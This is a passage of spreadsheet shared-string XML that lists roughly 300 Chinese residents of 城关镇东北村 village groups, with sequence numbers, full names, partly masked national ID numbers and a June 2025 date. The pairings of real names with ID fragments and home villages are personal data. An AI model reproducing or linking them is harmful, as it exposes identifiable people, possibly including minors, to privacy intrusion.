  <si>
    <t>0131</t>
  </si>
  <si>
    <t>范海玉</t>
  </si>
  <si>
    <t>0132</t>
  </si>
  <si>
    <t>赵国娥</t>
  </si>
  <si>
    <t>0133</t>
  </si>
  <si>
    <t>李元华</t>
  </si>
  <si>
    <t>0134</t>
  </si>
  <si>
    <t>冯春兰</t>
  </si>
  <si>
    <t>0135</t>
  </si>
  <si>
    <t>钟金荣</t>
  </si>
  <si>
    <t>412921********0043</t>
  </si>
  <si>
    <t>0136</t>
  </si>
  <si>
    <t>辛小香</t>
  </si>
  <si>
    <t>412921********0064</t>
  </si>
  <si>
    <t>0137</t>
  </si>
  <si>
    <t>王兴发</t>
  </si>
  <si>
    <t>412921********0010</t>
  </si>
  <si>
    <t>0138</t>
  </si>
  <si>
    <t>郭红杰</t>
  </si>
  <si>
    <t>0139</t>
  </si>
  <si>
    <t>曹会军</t>
  </si>
  <si>
    <t>0140</t>
  </si>
  <si>
    <t>曹露镱</t>
  </si>
  <si>
    <t>411321********0022</t>
  </si>
  <si>
    <t>2025年6月</t>
  </si>
  <si>
    <t>0141</t>
  </si>
  <si>
    <t>田炳绪</t>
  </si>
  <si>
    <t>412921********021X</t>
  </si>
  <si>
    <t>0142</t>
  </si>
  <si>
    <t>谷秀东</t>
  </si>
  <si>
    <t>0143</t>
  </si>
  <si>
    <t>0144</t>
  </si>
  <si>
    <t>张国敏</t>
  </si>
  <si>
    <t>0145</t>
  </si>
  <si>
    <t>张运甲</t>
  </si>
  <si>
    <t>411326********001X</t>
  </si>
  <si>
    <t>0146</t>
  </si>
  <si>
    <t>郭永山</t>
  </si>
  <si>
    <t>0147</t>
  </si>
  <si>
    <t>陈新云</t>
  </si>
  <si>
    <t>0148</t>
  </si>
  <si>
    <t>闫荣芝</t>
  </si>
  <si>
    <t>0149</t>
  </si>
  <si>
    <t>石万付</t>
  </si>
  <si>
    <t>412921********0072</t>
  </si>
  <si>
    <t>0150</t>
  </si>
  <si>
    <t>金元枝</t>
  </si>
  <si>
    <t>0151</t>
  </si>
  <si>
    <t>李书强</t>
  </si>
  <si>
    <t>412921********0014</t>
  </si>
  <si>
    <t>0152</t>
  </si>
  <si>
    <t>王世兰</t>
  </si>
  <si>
    <t>0153</t>
  </si>
  <si>
    <t>随丁环</t>
  </si>
  <si>
    <t>0154</t>
  </si>
  <si>
    <t>李兴阁</t>
  </si>
  <si>
    <t>0155</t>
  </si>
  <si>
    <t>刘国柱</t>
  </si>
  <si>
    <t>0156</t>
  </si>
  <si>
    <t>李纪要</t>
  </si>
  <si>
    <t>0157</t>
  </si>
  <si>
    <t>杨柳</t>
  </si>
  <si>
    <t>411326********0013</t>
  </si>
  <si>
    <t>0158</t>
  </si>
  <si>
    <t>赵华中</t>
  </si>
  <si>
    <t>412921********0015</t>
  </si>
  <si>
    <t>0159</t>
  </si>
  <si>
    <t>孙运英</t>
  </si>
  <si>
    <t>0160</t>
  </si>
  <si>
    <t>张连菊</t>
  </si>
  <si>
    <t>412921********0203</t>
  </si>
  <si>
    <t>0161</t>
  </si>
  <si>
    <t>赵玉玲</t>
  </si>
  <si>
    <t>412921********0267</t>
  </si>
  <si>
    <t>0162</t>
  </si>
  <si>
    <t>东北二组</t>
  </si>
  <si>
    <t>王太平</t>
  </si>
  <si>
    <t>412921********3328</t>
  </si>
  <si>
    <t>0163</t>
  </si>
  <si>
    <t>高生</t>
  </si>
  <si>
    <t>0164</t>
  </si>
  <si>
    <t>郭延松</t>
  </si>
  <si>
    <t>0165</t>
  </si>
  <si>
    <t>郭保剑</t>
  </si>
  <si>
    <t>411321********0032</t>
  </si>
  <si>
    <t>0166</t>
  </si>
  <si>
    <t>张自付</t>
  </si>
  <si>
    <t>0167</t>
  </si>
  <si>
    <t>代欣菊</t>
  </si>
  <si>
    <t>0168</t>
  </si>
  <si>
    <t>王桂兰</t>
  </si>
  <si>
    <t>0169</t>
  </si>
  <si>
    <t>李天平</t>
  </si>
  <si>
    <t>412921********028X</t>
  </si>
  <si>
    <t>0170</t>
  </si>
  <si>
    <t>刘景元</t>
  </si>
  <si>
    <t>0171</t>
  </si>
  <si>
    <t>张付军</t>
  </si>
  <si>
    <t>0172</t>
  </si>
  <si>
    <t>李付芝</t>
  </si>
  <si>
    <t>412921********0088</t>
  </si>
  <si>
    <t>0173</t>
  </si>
  <si>
    <t>丁世贵</t>
  </si>
  <si>
    <t>0174</t>
  </si>
  <si>
    <t>雷喜梅</t>
  </si>
  <si>
    <t>0175</t>
  </si>
  <si>
    <t>孙运奇</t>
  </si>
  <si>
    <t>412921********0035</t>
  </si>
  <si>
    <t>0176</t>
  </si>
  <si>
    <t>秦性华</t>
  </si>
  <si>
    <t>412921********0100</t>
  </si>
  <si>
    <t>0177</t>
  </si>
  <si>
    <t>魏振华</t>
  </si>
  <si>
    <t>0178</t>
  </si>
  <si>
    <t>常德生</t>
  </si>
  <si>
    <t>412921********0056</t>
  </si>
  <si>
    <t>0179</t>
  </si>
  <si>
    <t>王相甫</t>
  </si>
  <si>
    <t>0180</t>
  </si>
  <si>
    <t>王长荣</t>
  </si>
  <si>
    <t>0181</t>
  </si>
  <si>
    <t>许来福</t>
  </si>
  <si>
    <t>0182</t>
  </si>
  <si>
    <t>贾青芳</t>
  </si>
  <si>
    <t>0183</t>
  </si>
  <si>
    <t>张吉臣</t>
  </si>
  <si>
    <t>0184</t>
  </si>
  <si>
    <t>李敏英</t>
  </si>
  <si>
    <t>0185</t>
  </si>
  <si>
    <t>张怀君</t>
  </si>
  <si>
    <t>0186</t>
  </si>
  <si>
    <t>沈东焕</t>
  </si>
  <si>
    <t>411324********0043</t>
  </si>
  <si>
    <t>0187</t>
  </si>
  <si>
    <t>陈国保</t>
  </si>
  <si>
    <t>412921********0038</t>
  </si>
  <si>
    <t>0188</t>
  </si>
  <si>
    <t>王荣兰</t>
  </si>
  <si>
    <t>0189</t>
  </si>
  <si>
    <t>周全永</t>
  </si>
  <si>
    <t>0190</t>
  </si>
  <si>
    <t>杨玉林</t>
  </si>
  <si>
    <t>412921********0091</t>
  </si>
  <si>
    <t>0191</t>
  </si>
  <si>
    <t>楚德合</t>
  </si>
  <si>
    <t>0192</t>
  </si>
  <si>
    <t>张国菊</t>
  </si>
  <si>
    <t>0193</t>
  </si>
  <si>
    <t>贺元大</t>
  </si>
  <si>
    <t>412921********0334</t>
  </si>
  <si>
    <t>0194</t>
  </si>
  <si>
    <t>张明杰</t>
  </si>
  <si>
    <t>0195</t>
  </si>
  <si>
    <t>沈朝正</t>
  </si>
  <si>
    <t>0196</t>
  </si>
  <si>
    <t>李金芳</t>
  </si>
  <si>
    <t>0197</t>
  </si>
  <si>
    <t>许平敏</t>
  </si>
  <si>
    <t>0198</t>
  </si>
  <si>
    <t>魏仁付</t>
  </si>
  <si>
    <t>0199</t>
  </si>
  <si>
    <t>常文秀</t>
  </si>
  <si>
    <t>0200</t>
  </si>
  <si>
    <t>张书仓</t>
  </si>
  <si>
    <t>0201</t>
  </si>
  <si>
    <t>刘振梅</t>
  </si>
  <si>
    <t>0202</t>
  </si>
  <si>
    <t>党国勤</t>
  </si>
  <si>
    <t>0203</t>
  </si>
  <si>
    <t>姬天秀</t>
  </si>
  <si>
    <t>412921********008X</t>
  </si>
  <si>
    <t>0204</t>
  </si>
  <si>
    <t>赵花香</t>
  </si>
  <si>
    <t>0205</t>
  </si>
  <si>
    <t>薛喜海</t>
  </si>
  <si>
    <t>0206</t>
  </si>
  <si>
    <t>吴桂川</t>
  </si>
  <si>
    <t>412921********0070</t>
  </si>
  <si>
    <t>0207</t>
  </si>
  <si>
    <t>李桂英</t>
  </si>
  <si>
    <t>412921********0142</t>
  </si>
  <si>
    <t>0208</t>
  </si>
  <si>
    <t>郑召龙</t>
  </si>
  <si>
    <t>0209</t>
  </si>
  <si>
    <t>柯玉芝</t>
  </si>
  <si>
    <t>0210</t>
  </si>
  <si>
    <t>石君阳</t>
  </si>
  <si>
    <t>0211</t>
  </si>
  <si>
    <t>张喜来</t>
  </si>
  <si>
    <t>0212</t>
  </si>
  <si>
    <t>李同君</t>
  </si>
  <si>
    <t>0213</t>
  </si>
  <si>
    <t>杨广霞</t>
  </si>
  <si>
    <t>412921********0068</t>
  </si>
  <si>
    <t>0214</t>
  </si>
  <si>
    <t>朱全荣</t>
  </si>
  <si>
    <t>0215</t>
  </si>
  <si>
    <t>任洪霞</t>
  </si>
  <si>
    <t>0216</t>
  </si>
  <si>
    <t>赵苍武</t>
  </si>
  <si>
    <t>0217</t>
  </si>
  <si>
    <t>杨国秀</t>
  </si>
  <si>
    <t>412921********0221</t>
  </si>
  <si>
    <t>0218</t>
  </si>
  <si>
    <t>王学云</t>
  </si>
  <si>
    <t>412921********0045</t>
  </si>
  <si>
    <t>0219</t>
  </si>
  <si>
    <t>任寿超</t>
  </si>
  <si>
    <t>0220</t>
  </si>
  <si>
    <t>郑云</t>
  </si>
  <si>
    <t>0221</t>
  </si>
  <si>
    <t>石英丽</t>
  </si>
  <si>
    <t>412921********0067</t>
  </si>
  <si>
    <t>0222</t>
  </si>
  <si>
    <t>谷小伟</t>
  </si>
  <si>
    <t>0223</t>
  </si>
  <si>
    <t>聂兴州</t>
  </si>
  <si>
    <t>0224</t>
  </si>
  <si>
    <t>吴永春</t>
  </si>
  <si>
    <t>0225</t>
  </si>
  <si>
    <t>司朝建</t>
  </si>
  <si>
    <t>0226</t>
  </si>
  <si>
    <t>柴嫦娥</t>
  </si>
  <si>
    <t>412921********0080</t>
  </si>
  <si>
    <t>0227</t>
  </si>
  <si>
    <t>范付杰</t>
  </si>
  <si>
    <t>0228</t>
  </si>
  <si>
    <t>张国华</t>
  </si>
  <si>
    <t>0229</t>
  </si>
  <si>
    <t>滑秀勤</t>
  </si>
  <si>
    <t>0230</t>
  </si>
  <si>
    <t>秦性军</t>
  </si>
  <si>
    <t>0231</t>
  </si>
  <si>
    <t>黄小香</t>
  </si>
  <si>
    <t>0232</t>
  </si>
  <si>
    <t>隋洪魁</t>
  </si>
  <si>
    <t>0233</t>
  </si>
  <si>
    <t>王德芳</t>
  </si>
  <si>
    <t>412921********0161</t>
  </si>
  <si>
    <t>0234</t>
  </si>
  <si>
    <t>张书珍</t>
  </si>
  <si>
    <t>0235</t>
  </si>
  <si>
    <t>孙中瑞</t>
  </si>
  <si>
    <t>411326********002X</t>
  </si>
  <si>
    <t>0236</t>
  </si>
  <si>
    <t>靳浩然</t>
  </si>
  <si>
    <t>411321********0011</t>
  </si>
  <si>
    <t>0237</t>
  </si>
  <si>
    <t>周保梅</t>
  </si>
  <si>
    <t>0238</t>
  </si>
  <si>
    <t>张红燕</t>
  </si>
  <si>
    <t>0239</t>
  </si>
  <si>
    <t>周军</t>
  </si>
  <si>
    <t>412921********009X</t>
  </si>
  <si>
    <t>0240</t>
  </si>
  <si>
    <t>周西峰</t>
  </si>
  <si>
    <t>0241</t>
  </si>
  <si>
    <t>孙建成</t>
  </si>
  <si>
    <t>0242</t>
  </si>
  <si>
    <t>王德玲</t>
  </si>
  <si>
    <t>412921********0324</t>
  </si>
  <si>
    <t>0243</t>
  </si>
  <si>
    <t>高芝</t>
  </si>
  <si>
    <t>0244</t>
  </si>
  <si>
    <t>刘杰</t>
  </si>
  <si>
    <t>0245</t>
  </si>
  <si>
    <t>刘钰晗</t>
  </si>
  <si>
    <t>411321********5583</t>
  </si>
  <si>
    <t>0246</t>
  </si>
  <si>
    <t>刘烁宇</t>
  </si>
  <si>
    <t>411321********5121</t>
  </si>
  <si>
    <t>0247</t>
  </si>
  <si>
    <t>张金峰</t>
  </si>
  <si>
    <t>0248</t>
  </si>
  <si>
    <t>李敏</t>
  </si>
  <si>
    <t>0249</t>
  </si>
  <si>
    <t>宋学伟</t>
  </si>
  <si>
    <t>0250</t>
  </si>
  <si>
    <t>黄金华</t>
  </si>
  <si>
    <t>412921********0342</t>
  </si>
  <si>
    <t>0251</t>
  </si>
  <si>
    <t>刘佳佳</t>
  </si>
  <si>
    <t>411321********0042</t>
  </si>
  <si>
    <t>0252</t>
  </si>
  <si>
    <t>隋元华</t>
  </si>
  <si>
    <t>0253</t>
  </si>
  <si>
    <t>董金仓</t>
  </si>
  <si>
    <t>0254</t>
  </si>
  <si>
    <t>张丰芝</t>
  </si>
  <si>
    <t>0255</t>
  </si>
  <si>
    <t>王付海</t>
  </si>
  <si>
    <t>0256</t>
  </si>
  <si>
    <t>李春贞</t>
  </si>
  <si>
    <t>412921********0214</t>
  </si>
  <si>
    <t>0257</t>
  </si>
  <si>
    <t>王文彩</t>
  </si>
  <si>
    <t>0258</t>
  </si>
  <si>
    <t>朱保印</t>
  </si>
  <si>
    <t>0259</t>
  </si>
  <si>
    <t>张霞</t>
  </si>
  <si>
    <t>0260</t>
  </si>
  <si>
    <t>东北三组</t>
  </si>
  <si>
    <t>刘德荣</t>
  </si>
  <si>
    <t>412921********0404</t>
  </si>
  <si>
    <t>0261</t>
  </si>
  <si>
    <t>刘国正</t>
  </si>
  <si>
    <t>412921********0051</t>
  </si>
  <si>
    <t>0262</t>
  </si>
  <si>
    <t>张保琴</t>
  </si>
  <si>
    <t>412921********0048</t>
  </si>
  <si>
    <t>0263</t>
  </si>
  <si>
    <t>0264</t>
  </si>
  <si>
    <t>高志科</t>
  </si>
  <si>
    <t>0265</t>
  </si>
  <si>
    <t>魏怀珍</t>
  </si>
  <si>
    <t>0266</t>
  </si>
  <si>
    <t>李金英</t>
  </si>
  <si>
    <t>0267</t>
  </si>
  <si>
    <t>任国风</t>
  </si>
  <si>
    <t>411326********006X</t>
  </si>
  <si>
    <t>0268</t>
  </si>
  <si>
    <t>郭永义</t>
  </si>
  <si>
    <t>0269</t>
  </si>
  <si>
    <t>靳应荣</t>
  </si>
  <si>
    <t>0270</t>
  </si>
  <si>
    <t>方俊德</t>
  </si>
  <si>
    <t>0271</t>
  </si>
  <si>
    <t>闫书斌</t>
  </si>
  <si>
    <t>0272</t>
  </si>
  <si>
    <t>陈生永</t>
  </si>
  <si>
    <t>0273</t>
  </si>
  <si>
    <t>陈生朋</t>
  </si>
  <si>
    <t>0274</t>
  </si>
  <si>
    <t>李长敏</t>
  </si>
  <si>
    <t>0275</t>
  </si>
  <si>
    <t>刘长建</t>
  </si>
  <si>
    <t>0276</t>
  </si>
  <si>
    <t>魏延雪</t>
  </si>
  <si>
    <t>0277</t>
  </si>
  <si>
    <t>林广科</t>
  </si>
  <si>
    <t>0278</t>
  </si>
  <si>
    <t>石三兰</t>
  </si>
  <si>
    <t>412921********0060</t>
  </si>
  <si>
    <t>0279</t>
  </si>
  <si>
    <t>曹会保</t>
  </si>
  <si>
    <t>0280</t>
  </si>
  <si>
    <t>李青旺</t>
  </si>
  <si>
    <t>0281</t>
  </si>
  <si>
    <t>闫学成</t>
  </si>
  <si>
    <t>0282</t>
  </si>
  <si>
    <t>周凤敏</t>
  </si>
  <si>
    <t>0283</t>
  </si>
  <si>
    <t>吴秀英</t>
  </si>
  <si>
    <t>0284</t>
  </si>
  <si>
    <t>王友敏</t>
  </si>
  <si>
    <t>412921********0033</t>
  </si>
  <si>
    <t>0285</t>
  </si>
  <si>
    <t>常德勤</t>
  </si>
  <si>
    <t>0286</t>
  </si>
  <si>
    <t>李萍</t>
  </si>
  <si>
    <t>0287</t>
  </si>
  <si>
    <t>马青华</t>
  </si>
  <si>
    <t>0288</t>
  </si>
  <si>
    <t>张仁凤</t>
  </si>
  <si>
    <t>0289</t>
  </si>
  <si>
    <t>李春常</t>
  </si>
  <si>
    <t>0290</t>
  </si>
  <si>
    <t>程元华</t>
  </si>
  <si>
    <t>0291</t>
  </si>
  <si>
    <t>王东杰</t>
  </si>
  <si>
    <t>0292</t>
  </si>
  <si>
    <t>王书珍</t>
  </si>
  <si>
    <t>0293</t>
  </si>
  <si>
    <t>胡秀芳</t>
  </si>
  <si>
    <t>0294</t>
  </si>
  <si>
    <t>412921********0299</t>
  </si>
  <si>
    <t>0295</t>
  </si>
  <si>
    <t>杨兴会</t>
  </si>
  <si>
    <t>412924********0728</t>
  </si>
  <si>
    <t>0296</t>
  </si>
  <si>
    <t>代欣然</t>
  </si>
  <si>
    <t>0297</t>
  </si>
  <si>
    <t>何国敏</t>
  </si>
  <si>
    <t>0298</t>
  </si>
  <si>
    <t>田光辉</t>
  </si>
  <si>
    <t>0299</t>
  </si>
  <si>
    <t>李振坤</t>
  </si>
  <si>
    <t>412921********0059</t>
  </si>
  <si>
    <t>0300</t>
  </si>
  <si>
    <t>李文钰</t>
  </si>
  <si>
    <t>411326********0022</t>
  </si>
  <si>
    <t>0301</t>
  </si>
  <si>
    <t>贺凤</t>
  </si>
  <si>
    <t>412921********444X</t>
  </si>
  <si>
    <t>0302</t>
  </si>
  <si>
    <t>吴桂珍</t>
  </si>
  <si>
    <t>0303</t>
  </si>
  <si>
    <t>汤友强</t>
  </si>
  <si>
    <t>411326********0017</t>
  </si>
  <si>
    <t>0304</t>
  </si>
  <si>
    <t>许文春</t>
  </si>
  <si>
    <t>412921********0310</t>
  </si>
  <si>
    <t>0305</t>
  </si>
  <si>
    <t>刘会敏</t>
  </si>
  <si>
    <t>0306</t>
  </si>
  <si>
    <t>吉怀印</t>
  </si>
  <si>
    <t>0307</t>
  </si>
  <si>
    <t>李建洲</t>
  </si>
  <si>
    <t>0308</t>
  </si>
  <si>
    <t>张付荣</t>
  </si>
  <si>
    <t>0309</t>
  </si>
  <si>
    <t>石三成</t>
  </si>
  <si>
    <t>412921********0399</t>
  </si>
  <si>
    <t>0310</t>
  </si>
  <si>
    <t>王杰</t>
  </si>
  <si>
    <t>0311</t>
  </si>
  <si>
    <t>魏洪林</t>
  </si>
  <si>
    <t>412921********511X</t>
  </si>
  <si>
    <t>0312</t>
  </si>
  <si>
    <t>田发根</t>
  </si>
  <si>
    <t>0313</t>
  </si>
  <si>
    <t>田俊英</t>
  </si>
  <si>
    <t>0314</t>
  </si>
  <si>
    <t>曲佳存</t>
  </si>
  <si>
    <t>411326********0012</t>
  </si>
  <si>
    <t>0315</t>
  </si>
  <si>
    <t>曲梦然</t>
  </si>
  <si>
    <t>411328********2944</t>
  </si>
  <si>
    <t>0316</t>
  </si>
  <si>
    <t>赵俊青</t>
  </si>
  <si>
    <t>0317</t>
  </si>
  <si>
    <t>王万克</t>
  </si>
  <si>
    <t>0318</t>
  </si>
  <si>
    <t>闫荣芬</t>
  </si>
  <si>
    <t>0319</t>
  </si>
  <si>
    <t>郝春丽</t>
  </si>
  <si>
    <t>0320</t>
  </si>
  <si>
    <t>吴铁梁</t>
  </si>
  <si>
    <t>0321</t>
  </si>
  <si>
    <t>樊德焕</t>
  </si>
  <si>
    <t>0322</t>
  </si>
  <si>
    <t>赵创</t>
  </si>
  <si>
    <t>0323</t>
  </si>
  <si>
    <t>赵艺涵</t>
  </si>
  <si>
    <t>411321********0020</t>
  </si>
  <si>
    <t>0324</t>
  </si>
  <si>
    <t>谢庆凡</t>
  </si>
  <si>
    <t>0325</t>
  </si>
  <si>
    <t>杨明清</t>
  </si>
  <si>
    <t>0326</t>
  </si>
  <si>
    <t>曾祥平</t>
  </si>
  <si>
    <t>0327</t>
  </si>
  <si>
    <t>谷秀珍</t>
  </si>
  <si>
    <t>412921********0200</t>
  </si>
  <si>
    <t>0328</t>
  </si>
  <si>
    <t>林长</t>
  </si>
  <si>
    <t>0329</t>
  </si>
  <si>
    <t>赵全会</t>
  </si>
  <si>
    <t>0330</t>
  </si>
  <si>
    <t>何庆盈</t>
  </si>
  <si>
    <t>0331</t>
  </si>
  <si>
    <t>靳德军</t>
  </si>
  <si>
    <t>0332</t>
  </si>
  <si>
    <t>亿长云</t>
  </si>
  <si>
    <t>0333</t>
  </si>
  <si>
    <t>曹会霞</t>
  </si>
  <si>
    <t>0334</t>
  </si>
  <si>
    <t>李万杰</t>
  </si>
  <si>
    <t>412921********513X</t>
  </si>
  <si>
    <t>0335</t>
  </si>
  <si>
    <t>东北村</t>
  </si>
  <si>
    <t>沈金洪</t>
  </si>
  <si>
    <t>0336</t>
  </si>
  <si>
    <t>石光召</t>
  </si>
  <si>
    <t>0337</t>
  </si>
  <si>
    <t>刘玉凤</t>
  </si>
  <si>
    <t>0338</t>
  </si>
  <si>
    <t>吴秋颖</t>
  </si>
  <si>
    <t>0339</t>
  </si>
  <si>
    <t>李彬</t>
  </si>
  <si>
    <t>0340</t>
  </si>
  <si>
    <t>李梓嘉</t>
  </si>
  <si>
    <t>411321********0285</t>
  </si>
  <si>
    <t>0341</t>
  </si>
  <si>
    <t>毛钦连</t>
  </si>
  <si>
    <t>0342</t>
  </si>
  <si>
    <t>赵平远</t>
  </si>
  <si>
    <t>0343</t>
  </si>
  <si>
    <t>陈付梅</t>
  </si>
  <si>
    <t>0344</t>
  </si>
  <si>
    <t>0345</t>
  </si>
  <si>
    <t>0346</t>
  </si>
  <si>
    <t>赵运花</t>
  </si>
  <si>
    <t>0347</t>
  </si>
  <si>
    <t>刘喜瑞</t>
  </si>
  <si>
    <t>412921********5125</t>
  </si>
  <si>
    <t>0348</t>
  </si>
  <si>
    <t>杨树春</t>
  </si>
  <si>
    <t>412921********0062</t>
  </si>
  <si>
    <t>0349</t>
  </si>
  <si>
    <t>赵国锦</t>
  </si>
  <si>
    <t>0350</t>
  </si>
  <si>
    <t>史铁成</t>
  </si>
  <si>
    <t>0351</t>
  </si>
  <si>
    <t>赵长秀</t>
  </si>
  <si>
    <t>0352</t>
  </si>
  <si>
    <t>郑霞</t>
  </si>
  <si>
    <t>0353</t>
  </si>
  <si>
    <t>曹国勤</t>
  </si>
  <si>
    <t>412921********0105</t>
  </si>
  <si>
    <t>0354</t>
  </si>
  <si>
    <t>陈清合</t>
  </si>
  <si>
    <t>0355</t>
  </si>
  <si>
    <t>王德梅</t>
  </si>
  <si>
    <t>0356</t>
  </si>
  <si>
    <t>陈欣怡</t>
  </si>
  <si>
    <t>411321********0461</t>
  </si>
  <si>
    <t>0357</t>
  </si>
  <si>
    <t>谷秀杰</t>
  </si>
  <si>
    <t>0358</t>
  </si>
  <si>
    <t>靳小红</t>
  </si>
  <si>
    <t>0359</t>
  </si>
  <si>
    <t>靳袁镜</t>
  </si>
  <si>
    <t>411321********0024</t>
  </si>
  <si>
    <t>0360</t>
  </si>
  <si>
    <t>李清云</t>
  </si>
  <si>
    <t>0361</t>
  </si>
  <si>
    <t>李霞</t>
  </si>
  <si>
    <t>0362</t>
  </si>
  <si>
    <t>刘廷国</t>
  </si>
  <si>
    <t>412921********5119</t>
  </si>
  <si>
    <t>0363</t>
  </si>
  <si>
    <t>方荣杰</t>
  </si>
  <si>
    <t>412921********5140</t>
  </si>
  <si>
    <t>0364</t>
  </si>
  <si>
    <t>田向宇</t>
  </si>
  <si>
    <t>0365</t>
  </si>
  <si>
    <t>王德华</t>
  </si>
  <si>
    <t>0366</t>
  </si>
  <si>
    <t>金振惠</t>
  </si>
  <si>
    <t>412921********0168</t>
  </si>
  <si>
    <t>0367</t>
  </si>
  <si>
    <t>王来科</t>
  </si>
  <si>
    <t>0368</t>
  </si>
  <si>
    <t>王秀英</t>
  </si>
  <si>
    <t>0369</t>
  </si>
  <si>
    <t>王奇发</t>
  </si>
  <si>
    <t>0370</t>
  </si>
  <si>
    <t>吴桂朝</t>
  </si>
  <si>
    <t>0371</t>
  </si>
  <si>
    <t>吴庆玉</t>
  </si>
  <si>
    <t>0372</t>
  </si>
  <si>
    <t>郭永香</t>
  </si>
  <si>
    <t>0373</t>
  </si>
  <si>
    <t>徐国信</t>
  </si>
  <si>
    <t>0374</t>
  </si>
  <si>
    <t>许召付</t>
  </si>
  <si>
    <t>412921********0193</t>
  </si>
  <si>
    <t>0375</t>
  </si>
  <si>
    <t>郭心芝</t>
  </si>
  <si>
    <t>0376</t>
  </si>
  <si>
    <t>杨素芝</t>
  </si>
  <si>
    <t>0377</t>
  </si>
  <si>
    <t>沈润坤</t>
  </si>
  <si>
    <t>411326********0043</t>
  </si>
  <si>
    <t>0378</t>
  </si>
  <si>
    <t>张庆芝</t>
  </si>
  <si>
    <t>0379</t>
  </si>
  <si>
    <t>张召峰</t>
  </si>
  <si>
    <t>0380</t>
  </si>
  <si>
    <t>赵运荣</t>
  </si>
  <si>
    <t>412921********0128</t>
  </si>
  <si>
    <t>0381</t>
  </si>
  <si>
    <t>胡生玉</t>
  </si>
  <si>
    <t>0382</t>
  </si>
  <si>
    <t>杨玉华</t>
  </si>
  <si>
    <t>412921********1563</t>
  </si>
  <si>
    <t>0383</t>
  </si>
  <si>
    <t>张晓</t>
  </si>
  <si>
    <t>411326********0023</t>
  </si>
  <si>
    <t>0384</t>
  </si>
  <si>
    <t>薛庚申</t>
  </si>
  <si>
    <t>0385</t>
  </si>
  <si>
    <t>谢建生</t>
  </si>
  <si>
    <t>411326********0079</t>
  </si>
  <si>
    <t>0386</t>
  </si>
  <si>
    <t>谢政彬</t>
  </si>
  <si>
    <t>411321********0053</t>
  </si>
  <si>
    <t>0387</t>
  </si>
  <si>
    <t>刘长昊</t>
  </si>
  <si>
    <t>411321********043X</t>
  </si>
  <si>
    <t>0388</t>
  </si>
  <si>
    <t>刘冬忠</t>
  </si>
  <si>
    <t>0389</t>
  </si>
  <si>
    <t>李青杰</t>
  </si>
  <si>
    <t>0390</t>
  </si>
  <si>
    <t>聂飞</t>
  </si>
  <si>
    <t>0391</t>
  </si>
  <si>
    <t>安付贵</t>
  </si>
  <si>
    <t>0392</t>
  </si>
  <si>
    <t>李玉梅</t>
  </si>
  <si>
    <t>412921********7746</t>
  </si>
  <si>
    <t>0393</t>
  </si>
  <si>
    <t>方运献</t>
  </si>
  <si>
    <t>0394</t>
  </si>
  <si>
    <t>沈鹏</t>
  </si>
  <si>
    <t>0395</t>
  </si>
  <si>
    <t>赵金华</t>
  </si>
  <si>
    <t>0396</t>
  </si>
  <si>
    <t>孙平</t>
  </si>
  <si>
    <t>0397</t>
  </si>
  <si>
    <t>王运春</t>
  </si>
  <si>
    <t>0398</t>
  </si>
  <si>
    <t>席清敏</t>
  </si>
  <si>
    <t>412921********0089</t>
  </si>
  <si>
    <t>0399</t>
  </si>
  <si>
    <t>杨立刚</t>
  </si>
  <si>
    <t>0400</t>
  </si>
  <si>
    <t>贾清荣</t>
  </si>
  <si>
    <t>0401</t>
  </si>
  <si>
    <t>刘花荣</t>
  </si>
  <si>
    <t>0402</t>
  </si>
  <si>
    <t>曹炎</t>
  </si>
  <si>
    <t>0403</t>
  </si>
  <si>
    <t>李元振</t>
  </si>
  <si>
    <t>412921********0356</t>
  </si>
  <si>
    <t>0404</t>
  </si>
  <si>
    <t>张华</t>
  </si>
  <si>
    <t>412921********0149</t>
  </si>
  <si>
    <t>0405</t>
  </si>
  <si>
    <t>范振荣</t>
  </si>
  <si>
    <t>0406</t>
  </si>
  <si>
    <t>尚萍</t>
  </si>
  <si>
    <t>0407</t>
  </si>
  <si>
    <t>陈天伟</t>
  </si>
  <si>
    <t>412921********0235</t>
  </si>
  <si>
    <t>0408</t>
  </si>
  <si>
    <t>翟远敏</t>
  </si>
  <si>
    <t>0409</t>
  </si>
  <si>
    <t>石洪敏</t>
  </si>
  <si>
    <t>0410</t>
  </si>
  <si>
    <t>王爱</t>
  </si>
  <si>
    <t>0411</t>
  </si>
  <si>
    <t>朱红明</t>
  </si>
  <si>
    <t>0412</t>
  </si>
  <si>
    <t>王森</t>
  </si>
  <si>
    <t>411326********0056</t>
  </si>
  <si>
    <t>4113210101</t>
  </si>
  <si>
    <t>0413</t>
  </si>
  <si>
    <t>刘荣兰</t>
  </si>
  <si>
    <t>0414</t>
  </si>
  <si>
    <t>仝太军</t>
  </si>
  <si>
    <t>0415</t>
  </si>
  <si>
    <t>城关</t>
  </si>
  <si>
    <t>蔡黎</t>
  </si>
  <si>
    <t>0416</t>
  </si>
  <si>
    <t>城关东北六组</t>
  </si>
  <si>
    <t>梁燕</t>
  </si>
  <si>
    <t>411326********0026</t>
  </si>
  <si>
    <t>0417</t>
  </si>
  <si>
    <t>任肖征</t>
  </si>
  <si>
    <t>0418</t>
  </si>
  <si>
    <t>城关镇中华村</t>
  </si>
  <si>
    <t>刘双龙</t>
  </si>
  <si>
    <t>0419</t>
  </si>
  <si>
    <t>刘鸿涛</t>
  </si>
  <si>
    <t>411324********301X</t>
  </si>
  <si>
    <t>0420</t>
  </si>
  <si>
    <t>刘靳琪</t>
  </si>
  <si>
    <t>411321********5180</t>
  </si>
  <si>
    <t>0421</t>
  </si>
  <si>
    <t>张殿洲</t>
  </si>
  <si>
    <t>412921********0074</t>
  </si>
  <si>
    <t>0422</t>
  </si>
  <si>
    <t>李文忠</t>
  </si>
  <si>
    <t>0423</t>
  </si>
  <si>
    <t>李增伟</t>
  </si>
  <si>
    <t>411321********6163</t>
  </si>
  <si>
    <t>0424</t>
  </si>
  <si>
    <t>郭相全</t>
  </si>
  <si>
    <t>0425</t>
  </si>
  <si>
    <t>郭淯硕</t>
  </si>
  <si>
    <t>411321********3002</t>
  </si>
  <si>
    <t>0426</t>
  </si>
  <si>
    <t>褚清瑞</t>
  </si>
  <si>
    <t>0427</t>
  </si>
  <si>
    <t>城关镇东北村</t>
  </si>
  <si>
    <t>马秋</t>
  </si>
  <si>
    <t>0428</t>
  </si>
  <si>
    <t>耿明多</t>
  </si>
  <si>
    <t>412921********0082</t>
  </si>
  <si>
    <t>0429</t>
  </si>
  <si>
    <t>魏廷芳</t>
  </si>
  <si>
    <t>0430</t>
  </si>
  <si>
    <t>程栓成</t>
  </si>
  <si>
    <t>0431</t>
  </si>
  <si>
    <t>周文成</t>
  </si>
  <si>
    <t>412921********0053</t>
  </si>
  <si>
    <t>0432</t>
  </si>
  <si>
    <t>温延荣</t>
  </si>
  <si>
